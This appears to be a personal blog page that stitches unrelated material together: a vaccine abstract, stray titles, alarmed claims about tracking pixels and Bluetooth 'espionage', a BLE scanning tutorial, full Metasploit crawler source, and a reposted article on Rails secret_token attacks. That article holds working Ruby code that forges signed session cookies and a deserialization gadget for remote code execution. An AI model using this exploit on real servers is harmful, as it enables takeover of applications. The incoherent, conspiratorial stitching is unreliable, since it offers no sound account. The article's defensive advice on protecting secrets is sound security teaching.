Sunday, September 25, 2016

T-cell-inducing vaccines - what's the future ...

SEARCHING FOR IMMORTALITY

Abstract

In the twentieth century vaccine development has moved from the use of attenuated or killed micro-organisms to protein sub-unit vaccines, with vaccine immunogenicity assessed by measuring antibodies induced by vaccination. However, for many infectious diseases T cells are an important part of naturally acquired protective immune responses, and inducing these by vaccination has been the aim of much research. The progress that has been made in developing effective T-cell-inducing vaccines against viral and parasitic diseases such as HIV and malaria is discussed, along with recent developments in therapeutic vaccine development for chronic viral infections and cancer. Although many ways of inducing T cells by vaccination have been assessed, the majority result in low level, non-protective responses. Sufficient clinical research has now been conducted to establish that replication-deficient viral vectored vaccines lead the field in inducing strong and broad responses, and efficacy studies of T-cell-inducing vaccines against a number of diseases are finally demonstrating that this is a valid approach to filling the gaps in our defence against not only infectious disease, but some forms of cancer.
© 2011 The Author. Immunology © 2011 Blackwell Publishing Ltd.

Argo Full Movie

Enigma - Total Eclipse of the Moon

the tracking pixel

A tracking pixel is a graphic that mostly has dimensions of only 1x1 pixels. Thus, it is so small that it can hardly be seen by visitors of a website or email recipients. In order to remain hidden, these tracking pixels are partly or fully designed to be transparent, or camouflaged in the background color of the website. Users are usually not supposed to see the tracking pixel
 The tracking pixel URL is the memory location on the server. When the user visits a website, the image with the tag is loaded from this server


Tracking pixels within the source code might look like this:
 
PART OF THE CODE TO DETECTION:
 
 var extension = (/[.]/.exec(href)) ? /[^.]+$/.exec(href) : undefined;
                    var filePath = href;
                    _gaq.push(['_trackEvent', 'Download', 'Click-' + extension, filePath]);
                    if (jQuery(this).attr('target')

THEY USE THIS PROTOCOL : 

 
Eddystone-UID frame broadcasts


AND THIS TOP LEVEL ESPIONAGE ON BLUETOOTH


BLE

View Source
Step 1
Make a directory inside your "tessel-code" folder: enter mkdir ble into your command line, then change directory into that folder: cd ble
Step 2
Plug the BLE module into Tessel port A with the hexagon/icon side down and the electrical components on the top, then plug Tessel into your computer via USB.
Step 3
Install by typing npm install ble-ble113a into the command line.
Step 4
Save this code in a text file called ble.js:
// Any copyright is dedicated to the Public Domain.
// http://creativecommons.org/publicdomain/zero/1.0/

/*********************************************
This Bluetooth Low Energy module demo scans
for nearby BLE peripherals. Much more fun if
you have some BLE peripherals around.
*********************************************/

var tessel = require('tessel');
var blelib = require('ble-ble113a');

var ble = blelib.use(tessel.port['A']);

ble.on('ready', function(err) {
  console.log('Scanning...');
  ble.startScanning();
});

ble.on('discover', function(peripheral) {
  console.log("Discovered peripheral!", peripheral.toString());
});
Step 5
In your command line, tessel run ble.js
Set a Bluetooth Low Energy device to advertising and see if Tessel can find it!

Bonus: Change the code to print out only the address of discovered peripherals.

To see what else you can do with the BLE module, see the module docs here.


http://start.tessel.io/modules/ble 

ALTROUGHT THEY WORK ON ORACLE g11 so...I am using Ruby on Rails 3 and I would like to use the cookies.signed method in a Rack middleware. I need that because I would like to authenticate a user directly in the middleware than of using a before_filter in the application_controller.rb file.

Ruby on Rails Known Secret Session Cookie Remote Code Execution

This module implements Remote Command Execution on Ruby on Rails applications. Prerequisite is knowledge of the "secret_token" (Rails 2/3) or "secret_key_base" (Rails 4). The values for those can be usually found in the file "RAILS_ROOT/config/initializers/secret_token.rb". The module achieves RCE by deserialization of a crafted Ruby Object.

https://www.rapid7.com/db/modules/exploit/multi/http/rails_secret_deserialization 


How to hack a Rails app using its secret_token

22 Jul 2013
Create a new Rails app, open /config/initializers/secret_token.rb and you’ll see your app’s secret_token. As I will show you, if anyone who wishes you harm gets hold of this string then they can execute arbitrary code on your server. Troublingly, the Rails default includes it in your version control, and if you don’t remove it then anyone who gets or is given access to your codebase has complete, complete control over your server. Maybe you added them to your private repo for a code review, or unthinkingly put a side-project production app into a public repo, or someone sneaked a look at your Sublime while you were out. It doesn’t matter - if they have this key then they own you.

Why your secret_token is important - session cookies

Your secret_token is used for verifying the integrity of your app’s session cookies. A session cookie will look something like:
_MyApp_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTcyZTAwMmRjZTg2NTBiZmI0M2UwZmY0MjEyNGJjODBhBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWhmYTBKSGQwYVQxRlhnTFZWK2FEZEVhbEtLbDBMSitoVEo5YU4zR2dxM3M9BjsARg%3D%3D--dc40a55cd52fe32bb3b84ae0608956dfb5824689
The cookie value (the part after the =) is split into 2 parts, separated by --. The first part is a Base64 encoded serialization of the hash that Rails will use as the session variable in controllers. The second part is a signature created using secret_token, that Rails uses to check that the cookie it has been passed is legit. This prevents users from forging nefarious cookies and from tricking Rails into loading data it doesn’t want to load. Unless of course they have your secret_token and can also forge the signature…

The serialized session hash

The first part of the cookie is a Marshal dump of the session hash, encoded in Base64. Marshal is a Ruby object serialization format that is used here to allow Rails to persist objects between requests made in the same session. In many cases it will only store the session_id, _csrf_token and Warden authentication data, but calling session["foo"] = "bar" in your controllers allows you to store pretty much anything you want. For my cookie above, unescaping the URL encoding and then Base64 decoding gives:
"\x04\b{\aI\"\x0Fsession_id\x06:\x06EFI\"%72e002dce8650bfb43e0ff42124bc80a\x06;\x00TI\"\x10_csrf_token\x06;\x00FI\"1hfa0JHd0aT1FXgLVV+aDdEalKKl0LJ+hTJ9aN3Ggq3s=\x06;\x00F"
which if you squint hard enough is indeed starting to look kind of like a hash. This cookie is passed up to the server with each request, Rails calls Marshal.load on it, and merrily populates session with whatever serialized objects it is passed. Object persistance between requests. Brilliant.

The signature

But wait, the cookie obviously lives on the client side, which means that a user can set it to be anything they want. Which means that the user can pass in whatever serialized object they want to our app. And by the time we reinflate it and realise that they have passed us a small thermonuclear device, it will be too late and the attacker will be able to execute arbitrary code on our server.
That’s where our secret_token and the second part of the cookie value (the part after the --) come in. Whenever Rails gets a session cookie, it checks that it hasn’t been tampered with by verifying that the HMAC digest of the first part of the cookie with its secret_token matches the second, signature part. This means in order to craft a nefarious cookie an attacker would need to know the app’s secret_token. Unfortunately, just being called secret_token doesn’t make it secret, and, as already discussed, if you aren’t careful then it can easily end up somewhere you don’t want it to.
If you know an app’s secret_token and want to forge a valid cookie, you simply need to reverse the above process:
require "net/http"
require "uri"

secret_token = "stolen-from-github-or-somewhere"

# Construct your evil hash
my_evil_session_hash = {
    "ive_made_a_huge_mistake" => true
}

# Serialize your hash
marshal_dump = Marshal.dump(my_evil_session_hash)

# Base64 encode this dump
unescaped_cookie_value = Base64.encode64(marshal_dump)

# Escape any troublesome characters and remove line breaks altogether
escaped_cookie_value = CGI.escape(unescaped_cookie_value).gsub("%0A", "")

# Calculate the signature using the HMAC digest of the secret_token and the escaped cookie value. Replace %3D with equals signs.
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret_token, escaped_cookie_value.gsub("%3D", "="))

# Construct your evil cookie by concatenating the value with the signature
my_evil_cookie = "_MyApp_session=#{unescaped_cookie_value}--#{cookie_signature}"

# BOMBS AWAY
url = URI.parse("http://myapp.com/") # Make sure you have a trailing / if you are sending to the root path

req = Net::HTTP::Get.new(url.path)
req.add_field("Cookie", my_evil_cookie)

res = Net::HTTP.new(url.host, url.port).start do |http|
    http.request(req)
end
This request will load my_evil_session_hash into session, which is purely on principal not good. But loading arbitrary strings and integers is not about to melt any servers. How can you choose the contents of your hash so as to actually do some damage? Some obscure objects buried deep inside Rails are happy to oblige:
   
# Thanks to the folks at CodeClimate for pointing this out

# The code in the ERB will run when Rails unserializes it
erb = ERB.allocate
erb.instance_variable_set :@src, "User.steal_all_passwords; User.email_spam_to_all_users;"

proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
my_evil_session_hash = {
    "proxy_of_death" => Marshal.dump(proxy)
}
# ... continue as above
And presto.

Knowing is half the battle

ALL of this trouble can be trivially avoided by taking secret_token out of your version control. Put it into an environment variable (dotenv is handy for local, it’s easy on Heroku too) and you can sleep (a bit more) soundly at night. If you suspect that someone you wouldn’t want to meet on a dark night knows your secret_token then you can simply change it. All your existing cookies will be invalidated, but nothing else bad will happen. Of course, you still don’t want anyone you don’t trust to get any kind of access to your codebase at all. But you can at least make life difficult for them even if they do.

Thanks to

Rails Security by Code Climate and TechBrahmana
Discussion on Hacker News

Get more posts like this:

Archive
 
 
http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/  
 
AND FINALLY :
 
http://stackoverflow.com/questions/5343208/how-to-use-cookies-in-a-rack-middleware 
 
 
It looks like you should be able to do this:
  request = ActionDispatch::Request.new(env)
  request.cookie_jar.signed[:user_id] #=> 1
You can check out .../action_dispatch/middleware/cookies.rb on github to read more about exactly what is going on.
 

ALTROUGHT THEY WORJ WITH ORAGLE g11 so...


AND THEREFORE

Metasploit Web Crawler 2016-03-08T13:02:44
ID MSF:AUXILIARY/CRAWLER/MSFCRAWLER
Type metasploit
Reporter Rapid7

Description

This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.

Module Name

MSF:AUXILIARY/CRAWLER/MSFCRAWLER
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# Web Crawler.
#
# Author:  Efrain Torres   et [at] metasploit.com 2010
#
#

# openssl before rubygems mac os
require 'msf/core'
require 'openssl'
require 'rinda/tuplespace'
require 'pathname'
require 'uri'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'   => 'Metasploit Web Crawler',
      'Description'       => 'This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.',
      'Author'   => 'et',
      'License'   => MSF_LICENSE
    ))

    register_options([
      OptString.new('PATH', [true, "Starting crawling path", '/']),
      OptInt.new('RPORT', [true, "Remote port", 80 ])
    ], self.class)

    register_advanced_options([
      OptPath.new('CrawlerModulesDir', [true, 'The base directory containing the crawler modules',
        File.join(Msf::Config.data_directory, "msfcrawler")
      ]),
      OptBool.new('EnableUl', [ false, "Enable maximum number of request per URI", true ]),
      OptBool.new('StoreDB', [ false, "Store requests in database", false ]),
      OptInt.new('MaxUriLimit', [ true, "Number max. request per URI", 10]),
      OptInt.new('SleepTime', [ true, "Sleep time (secs) between requests", 0]),
      OptInt.new('TakeTimeout', [ true, "Timeout for loop ending", 15]),
      OptInt.new('ReadTimeout', [ true, "Read timeout (-1 forever)", 3]),
      OptInt.new('ThreadNum', [ true, "Threads number", 20]),
      OptString.new('DontCrawl', [true, "Filestypes not to crawl", '.exe,.zip,.tar,.bz2,.run,.asc,.gz'])
    ], self.class)
  end

  attr_accessor :ctarget, :cport, :cssl

  def run
    i, a = 0, []

    self.ctarget = datastore['RHOSTS']
    self.cport = datastore['RPORT']
    self.cssl = datastore['SSL']
    inipath = datastore['PATH']

    cinipath = (inipath.nil? or inipath.empty?) ? '/' : inipath

    inireq = {
        'rhost'  => ctarget,
        'rport'  => cport,
        'uri'   => cinipath,
        'method'    => 'GET',
        'ctype'  => 'text/plain',
        'ssl'  => cssl,
        'query'  => nil,
        'data'  => nil
    }

    @NotViewedQueue = Rinda::TupleSpace.new
    @ViewedQueue = Hash.new
    @UriLimits = Hash.new
    @curent_site = self.ctarget

    insertnewpath(inireq)

    print_status("Loading modules: #{datastore['CrawlerModulesDir']}")
    load_modules(datastore['CrawlerModulesDir'])
    print_status("OK")

    if datastore['EnableUl']
      print_status("URI LIMITS ENABLED: #{datastore['MaxUriLimit']} (Maximum number of requests per uri)")
    end

    print_status("Target: #{self.ctarget} Port: #{self.cport} Path: #{cinipath} SSL: #{self.cssl}")


    begin
      reqfilter = reqtemplate(self.ctarget,self.cport,self.cssl)

      i =0

      loop do

        ####
        #if i <= datastore['ThreadNum']
        # a.push(Thread.new {
        ####

        hashreq = @NotViewedQueue.take(reqfilter, datastore['TakeTimeout'])

        ul = false
        if @UriLimits.include?(hashreq['uri']) and datastore['EnableUl']
          #puts "Request #{@UriLimits[hashreq['uri']]}/#{$maxurilimit} #{hashreq['uri']}"
          if @UriLimits[hashreq['uri']] >= datastore['MaxUriLimit']
            #puts "URI LIMIT Reached: #{$maxurilimit} for uri #{hashreq['uri']}"
            ul = true
          end
        else
          @UriLimits[hashreq['uri']] = 0
        end

        if !@ViewedQueue.include?(hashsig(hashreq)) and !ul

          @ViewedQueue[hashsig(hashreq)] = Time.now
          @UriLimits[hashreq['uri']] += 1

          if !File.extname(hashreq['uri']).empty? and datastore['DontCrawl'].include? File.extname(hashreq['uri'])
            vprint_status "URI not crawled #{hashreq['uri']}"
          else
              prx = nil
              #if self.useproxy
              # prx = "HTTP:"+self.proxyhost.to_s+":"+self.proxyport.to_s
              #end

              c = Rex::Proto::Http::Client.new(
                self.ctarget,
                self.cport.to_i,
                {},
                self.cssl,
                nil,
                prx
              )

              sendreq(c,hashreq)
          end
        else
          vprint_line "#{hashreq['uri']} already visited. "
        end

        ####
        #})

        #i += 1
        #else
        # sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty?
        # i = 0
        #end
        ####

      end
    rescue Rinda::RequestExpiredError
      print_status("END.")
      return
    end

    print_status("Finished crawling")
  end

  def reqtemplate(target,port,ssl)
    hreq = {
      'rhost'  => target,
      'rport'  => port,
      'uri'    => nil,
      'method'    => nil,
      'ctype'  => nil,
      'ssl'  => ssl,
      'query'  => nil,
      'data'  => nil
    }

    return hreq
  end

  def storedb(hashreq,response,dbpath)

    info = {
      :web_site => @current_site,
      :path     => hashreq['uri'],
      :query    => hashreq['query'],
      :data => hashreq['data'],
      :code     => response['code'],
      :body     => response['body'],
      :headers  => response['headers']
    }

    #if response['content-type']
    # info[:ctype] = response['content-type'][0]
    #end

    #if response['set-cookie']
    # info[:cookie] = page.headers['set-cookie'].join("\n")
    #end

    #if page.headers['authorization']
    # info[:auth] = page.headers['authorization'].join("\n")
    #end

    #if page.headers['location']
    # info[:location] = page.headers['location'][0]
    #end

    #if page.headers['last-modified']
    # info[:mtime] = page.headers['last-modified'][0]
    #end

    # Report the web page to the database
    report_web_page(info)
  end

  #
  # Modified version of load_protocols from psnuffle by Max Moser  @remote-exploit.org>
  #

  def load_modules(crawlermodulesdir)

    base = crawlermodulesdir
    if (not File.directory?(base))
      raise RuntimeError,"The Crawler modules parameter is set to an invalid directory"
    end

    @crawlermodules = {}
    cmodules = Dir.new(base).entries.grep(/\.rb$/).sort
    cmodules.each do |n|
      f = File.join(base, n)
      m = ::Module.new
      begin
        m.module_eval(File.read(f, File.size(f)))
        m.constants.grep(/^Crawler(.*)/) do
          cmod = $1
          klass = m.const_get("Crawler#{cmod}")
          @crawlermodules[cmod.downcase] = klass.new(self)

          print_status("Loaded crawler module #{cmod} from #{f}...")
        end
      rescue ::Exception => e
        print_error("Crawler module #{n} failed to load: #{e.class} #{e} #{e.backtrace}")
      end
    end
  end

  def sendreq(nclient,reqopts={})

    begin
      r = nclient.request_raw(reqopts)
      resp = nclient.send_recv(r, datastore['ReadTimeout'])

      if resp
        #
        # Quickfix for bug packet.rb to_s line: 190
        # In case modules or crawler calls to_s on de-chunked responses
        #
        resp.transfer_chunked = false

        if datastore['StoreDB']
          storedb(reqopts,resp,$dbpathmsf)
        end

        print_status ">> [#{resp.code}] #{reqopts['uri']}"

        if reqopts['query'] and !reqopts['query'].empty?
          print_status ">>> [Q] #{reqopts['query']}"
        end

        if reqopts['data']
          print_status ">>> [D] #{reqopts['data']}"
        end

        case resp.code
        when 200
          @crawlermodules.each_key do |k|
            @crawlermodules[k].parse(reqopts,resp)
          end
        when 301..303
          print_line("[#{resp.code}] Redirection to: #{resp['Location']}")
          vprint_status urltohash('GET',resp['Location'],reqopts['uri'],nil)
          insertnewpath(urltohash('GET',resp['Location'],reqopts['uri'],nil))
        when 404
          print_status "[404] Invalid link #{reqopts['uri']}"
        else
          print_status "Unhandled #{resp.code}"
        end

      else
        print_status "No response"
      end
      sleep(datastore['SleepTime'])
    rescue
      print_status "ERROR"
      vprint_status "#{$!}: #{$!.backtrace}"
    end
  end

  #
  # Add new path (uri) to test non-viewed queue
  #

  def insertnewpath(hashreq)

    hashreq['uri'] = canonicalize(hashreq['uri'])

    if hashreq['rhost'] == datastore['RHOSTS'] and hashreq['rport'] == datastore['RPORT']
      if !@ViewedQueue.include?(hashsig(hashreq))
        if @NotViewedQueue.read_all(hashreq).size > 0
          vprint_status "Already in queue to be viewed: #{hashreq['uri']}"
        else
          vprint_status "Inserted: #{hashreq['uri']}"

          @NotViewedQueue.write(hashreq)
        end
      else
        vprint_status "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}"
      end
    end
  end

  #
  # Build a new hash for a local path
  #

  def urltohash(m,url,basepath,dat)

      # m:   method
      # url: uri?[query]
      # basepath: base path/uri to determine absolute path when relative
      # data: body data, nil if GET and query = uri.query

      uri = URI.parse(url)
      uritargetssl = (uri.scheme == "https") ? true : false

      uritargethost = uri.host
      if (uri.host.nil? or uri.host.empty?)
        uritargethost = self.ctarget
        uritargetssl = self.cssl
      end

      uritargetport = uri.port
      if (uri.port.nil?)
        uritargetport = self.cport
      end

      uritargetpath = uri.path
      if (uri.path.nil? or uri.path.empty?)
        uritargetpath = "/"
      end

      newp = Pathname.new(uritargetpath)
      oldp = Pathname.new(basepath)
      if !newp.absolute?
        if oldp.to_s[-1,1] == '/'
          newp = oldp+newp
        else
          if !newp.to_s.empty?
            newp = File.join(oldp.dirname,newp)
          end
        end
      end

      hashreq = {
        'rhost'  => uritargethost,
        'rport'  => uritargetport,
        'uri'   => newp.to_s,
        'method'    => m,
        'ctype'  => 'text/plain',
        'ssl'  => uritargetssl,
        'query'  => uri.query,
        'data'  => nil
      }

      if m == 'GET' and !dat.nil?
        hashreq['query'] = dat
      else
        hashreq['data'] = dat
      end

      return hashreq
  end

  # Taken from http://www.ruby-forum.com/topic/140101 by  Rob Biedenharn
  def canonicalize(uri)

    u = uri.kind_of?(URI) ? uri : URI.parse(uri.to_s)
    u.normalize!
    newpath = u.path
    while newpath.gsub!(%r{([^/]+)/\.\./?}) { |match|
      $1 == '..' ? match : ''
    } do end
    newpath = newpath.gsub(%r{/\./}, '/').sub(%r{/\.\z}, '/')
    u.path = newpath
    # Ugly fix
    u.path = u.path.gsub("\/..\/","\/")
    u.to_s
  end

  def hashsig(hashreq)
    hashreq.to_s
  end

end

class BaseParser
  attr_accessor :crawler

  def initialize(c)
    self.crawler = c
  end

  def parse(request,result)
    nil
  end

  #
  # Add new path (uri) to test hash queue
  #
  def insertnewpath(hashreq)
    self.crawler.insertnewpath(hashreq)
  end

  def hashsig(hashreq)
    self.crawler.hashsig(hashreq)
  end

  def urltohash(m,url,basepath,dat)
    self.crawler.urltohash(m,url,basepath,dat)
  end

  def targetssl
    self.crawler.cssl
  end

  def targetport
    self.crawler.cport
  end

  def targethost
    self.crawler.ctarget
  end

  def targetinipath
    self.crawler.cinipath
  end
end

Man in the Rain